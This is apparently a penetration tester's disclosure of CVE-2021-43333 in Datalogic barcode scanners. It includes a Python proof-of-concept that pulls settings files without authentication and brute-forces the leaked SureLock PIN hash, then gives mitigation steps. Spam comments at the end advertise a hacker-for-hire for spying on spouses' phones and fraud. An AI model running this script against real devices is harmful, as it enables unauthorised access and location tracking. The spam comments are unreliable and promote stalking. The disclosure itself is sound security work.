
Notes from a Pentester: CVE-2021-43333 (DataLogic Devices)

During a recent pentest for a client we discovered a number of devices on their network that looked interesting; after 25 years of performing pentests you start to get a gut feeling about these things.




As with every pentest, we have to ensure that all standard testing is performed before we start looking into the more interesting things. Thankfully our client gave us the extra time to do so, and my gut feeling was correct. The security issues we found were assigned CVE-2021-43333.


The devices in question were handheld Android-based barcode scanners used for inventory purposes across a number of geographic locations. Built by a company called Datalogic, these devices are invaluable to organisations that require fast, reliable and cost-effective inventory check-in/check-out systems.


After identifying the issues, we have spent the last few months working hard with Datalogic, who have been a stellar example of how to respond, communicate and remediate issues brought to them by a security company. We are pleased to announce that Datalogic have not only fixed the issues in their current lineup but have also published remediation steps for those with older and even end-of-life products. That Datalogic are willing to support EOL devices to prevent security issues shows a commitment to their clients that other companies could learn a lot from.


At our request, MITRE assigned the two issues a single CVE in early November 2021, and now that Datalogic have released their fixes we are delighted to share the details with you.


Please see the security advisory from Datalogic here.


Please find the CVE details here (this will update when MITRE releases the entry to the public).


And for those of you who don't want to click links, please continue to read below.


Details


The Datalogic DL-Axist handheld scanner is a full-touch PDA with a barcode scanner, used in the field for asset management and similar tasks. The device runs Android 4.4.4 and several services. One of these is a web server, and from that web server it is possible to request the device's settings files without authentication. The device uses software from 42Gears to lock it down; the passcode for that lock is stored in the settings files as a SHA-512 hash. A second issue is that the device settings also list the Wi-Fi access points currently visible to the device.

In a default installation the SHA-512 hash is set to:

"c6001d5b2ac3df314204a8f9d7a00e1503c9aba0fd4538645de4bf4cc7e2555cfe9ff9d0236bf327ed3e907849a98df4d330c4bea551017d465b4c1d9b80bcb0"

This is the hash of the default passcode '0000'.


Obviously the default passcode can be changed, but because this code is usually a short numeric PIN and the hash is a plain SHA-512 of it, with no salt, the PIN is trivial to recover with an online hash lookup service or a quick brute force of the 10,000 four-digit values. It should be noted that this unlock code is not the device's own lock code, as we first suspected, but the passcode for the SureLock launcher (a kiosk solution for Android from 42Gears).


The second file of interest is getSettings.xml, which leaks a list of configured Wi-Fi access points. While this does not reveal the configured Wi-Fi passwords, the list of access points can be correlated with services such as wigle.net to narrow down the location of the device if it is unknown. In the case of our client, we were able to pinpoint multiple secure locations containing highly valuable assets.



Proof of concept/Steps to replicate


Browse to a non-existent location on the web server and the 404 page will direct you to the settings files; alternatively, browse directly to /getSettings.xml or /getInfo.xml to obtain the data. No credentials are requested at any point.
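The two steps above (pull the settings files without authentication, then recover the SureLock PIN from the leaked SHA-512 hash) as an added example. This is our own illustration, not code from the original post or from Datalogic. It assumes the DXU web server answers on plain HTTP at whatever base URL you pass in (the post does not give the port), and the XML element names in SAMPLE_XML are made up so the script can be exercised offline; the digest-harvesting step deliberately ignores the schema and just looks for 128-hex-digit tokens, so it works on either file.

```python
"""
Added example, not code from the Cygenta post or from Datalogic.

Pulls the settings files named in the post from the DXU web server without
credentials, harvests any SHA-512-sized digests from whatever comes back, and
recovers the numeric PIN behind each by exhausting the 4-6 digit keyspace.
Assumptions: plain HTTP at the base URL you pass in (the port is not given in
the post); the XML element names in SAMPLE_XML are hypothetical.
"""
import hashlib
import re
import urllib.error
import urllib.request

# Paths named in the post. The device's 404 page also links to them.
SETTINGS_PATHS = ("/getSettings.xml", "/getInfo.xml")

# Hash quoted in the post for a default installation; the post reports it is '0000'.
PUBLISHED_DEFAULT_HASH = ("c6001d5b2ac3df314204a8f9d7a00e1503c9aba0fd4538645de4bf4cc7e2555c"
                          "fe9ff9d0236bf327ed3e907849a98df4d330c4bea551017d465b4c1d9b80bcb0")

# 128 hex digits = one SHA-512 digest. Schema-independent, so it survives
# differences between getSettings.xml and getInfo.xml.
SHA512_HEX = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{128}(?![0-9a-fA-F])")

# Constructed stand-in for a real settings file (element names are hypothetical).
# The digest is generated here so the example runs offline.
SAMPLE_PIN = "2580"
SAMPLE_DIGEST = hashlib.sha512(SAMPLE_PIN.encode()).hexdigest()
SAMPLE_XML = f"""<?xml version="1.0"?>
<deviceInfo>
  <model>DL-Axist</model>
  <android>4.4.4</android>
  <lockdown vendor="42Gears">
    <passwordHash>{SAMPLE_DIGEST}</passwordHash>
  </lockdown>
</deviceInfo>
"""


def fetch(base_url, path, timeout=5.0):
    """Unauthenticated GET. Returns (status, body); (None, None) when nothing
    answers, which is the expected result once the DXU service is disabled."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except OSError:  # connection refused, timeout, DNS failure
        return None, None


def extract_digests(text):
    """Every distinct SHA-512-sized hex token in the document, lower-cased, in order."""
    found = []
    for token in SHA512_HEX.findall(text):
        token = token.lower()
        if token not in found:
            found.append(token)
    return found


def crack_pin(hex_digest, min_len=4, max_len=6):
    """Brute-force an unsalted SHA-512 of an all-digit PIN. 4..6 digits is
    1,110,000 candidates, a couple of seconds in CPython. With no salt the same
    PIN always yields the same digest, which is why online lookup tables work too."""
    target = hex_digest.lower()
    for length in range(min_len, max_len + 1):
        for n in range(10 ** length):
            pin = f"{n:0{length}d}"
            if hashlib.sha512(pin.encode()).hexdigest() == target:
                return pin
    return None


def harvest(text, **kw):
    """Map each digest found in a settings file to its recovered PIN (or None)."""
    return {d: crack_pin(d, **kw) for d in extract_digests(text)}


def probe(base_url, **kw):
    """Try every settings path on one device. A vulnerable device answers 200
    with recoverable PINs; a remediated one returns (None, None) for both paths."""
    report = {}
    for path in SETTINGS_PATHS:
        status, body = fetch(base_url, path)
        report[path] = (status, harvest(body, **kw) if body else {})
    return report


if __name__ == "__main__":
    print("offline sample:", harvest(SAMPLE_XML))
    print("published default hash ->", crack_pin(PUBLISHED_DEFAULT_HASH, 4, 4))
    # Against a real device (address and port are placeholders):
    # print(probe("http://192.0.2.10:80"))
```

The same `probe()` call doubles as a remediation check: after disabling the DXU service as described in the next section, both paths should come back as `(None, None)` rather than a 200 with a recoverable PIN.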


Mitigation and Fixes


To avoid this vulnerability, the DXU service must be disabled. On the device:

  1. Open DXU Agent.

  2. Tap the "more" icon in the lower right corner. A black bar will pop up.

  3. Tap "Settings" on the black bar. This brings up the settings menu.

  4. Tap "Settings" in the menu. This brings up the general DXU Agent settings.

  5. Uncheck the "Enable service" checkbox.

On newer devices, such as the Skorpio X5, the service is off by default. On older devices, such as the DL-Axist, it is on by default and must be switched off by hand.


Thanks


Cygenta would like to thank the staff at Datalogic for their professionalism, dedication to their clients and speed in mobilising their internal teams to remediate the security issues. In particular I would like to recognise Don and Simone for being key players in handling this issue.



To book your next pentest with us please feel free to get in touch with us to discuss how we can help you achieve your goals.




3 Comments


Jeffrey Glenn
Oct 19, 2023

I appreciate Henry for making me realise the truth to a certified hacker who knows a lot about what he is doing. I strongly recommend you hire him because he's the best out there and always delivers. I have referred over 10 people to him and all had positive results. He can help you hack into any devices, social networks including Facebook, Hangouts, iMessages, Twitter accounts, Snapchat, Instagram, WhatsApp, WeChat, text messages, smartphone cloning, tracking emails and also any other social media messenger or sites. It's advisable to hire a professional hacker. Thank me later. Contact him here: Henryclarkethicalhacker@gmail.com, and you can text, call and WhatsApp him on +1(201)4305865 or +1(219)7960574.....




Agnes Lizzy
Oct 14, 2023

Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. He is a cyber guru, he helps catch cheating spouses by hacking their communications like calls, Facebook, text, emails, Skype, WhatsApp and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statements, grades and many more. He will definitely help you, he has helped a lot of people, contact him on,…


Janet Lucy
Oct 12, 2023

I'm excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse's phone without a physical installation app. And I was able to access my spouse's phone, SMS, WhatsApp, Instagram, Facebook, WeChat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone. I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact: Henryclarkethicalhacker@gmail.com, and you can text, call him on WhatsApp…

